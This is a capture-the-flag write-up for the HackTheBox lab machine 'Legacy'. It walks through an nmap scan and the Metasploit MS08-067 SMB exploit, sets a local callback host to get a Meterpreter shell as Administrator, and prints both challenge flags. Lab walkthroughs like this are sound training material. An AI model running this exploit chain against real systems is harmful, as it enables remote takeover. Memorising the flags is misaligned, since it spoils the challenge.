10.10.10.4 LEGACY hackthebox machine writeup

LEGACY 10.10.10.4 Write Up

Machine Created by ch4p

Tools Used for Enumeration:

1. Nmap

Tools Used for Exploitation:

2. Metasploit

Steps for primary enumeration:

1. At first we use nmap (Network Mapping tool) to scan the box ip. When we run it we got list of some open ports and services running on those ports. On the Legacy box we can see, open ports and services are, port 139 for netbios-ssn and 445 for microsoft-ds.

command: nmap -A 10.10.10.4

Steps to get user.txt: 

1. If we look nmap scan result closely and google about running services, we will can find the vulnerable port is 445 microsoft-ds.
2. We can exploit and get shell using metasploit module (exploit/windows/smb/ms08_067_netapi).
command:
use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) >set rhosts 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) >set rport 445
msf exploit(windows/smb/ms08_067_netapi) >set lhost 10.10.14.3
msf exploit(windows/smb/ms08_067_netapi) >exploit

3. Now you will get meterpreter shell as Administrator.
4. Command to get user.txt: "cat 'C:\Documents and Settings\john\Desktop\user.txt'"

Steps to get root.txt:

1. Command to get root.txt: "cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'"

Flags:

1. user.txt flag: e69af0e4f443de7e36876fda4ec7644f
2. root.txt flag: 993442d258b0e0ec917cae9e695d5713

References:

1. https://medium.com/@hussaini.faisal/hackthebox-writeup-legacy-29878407abf1

Videos:

 1. Hackersploit walkthrough: https://youtu.be/uV6WNOfP8s8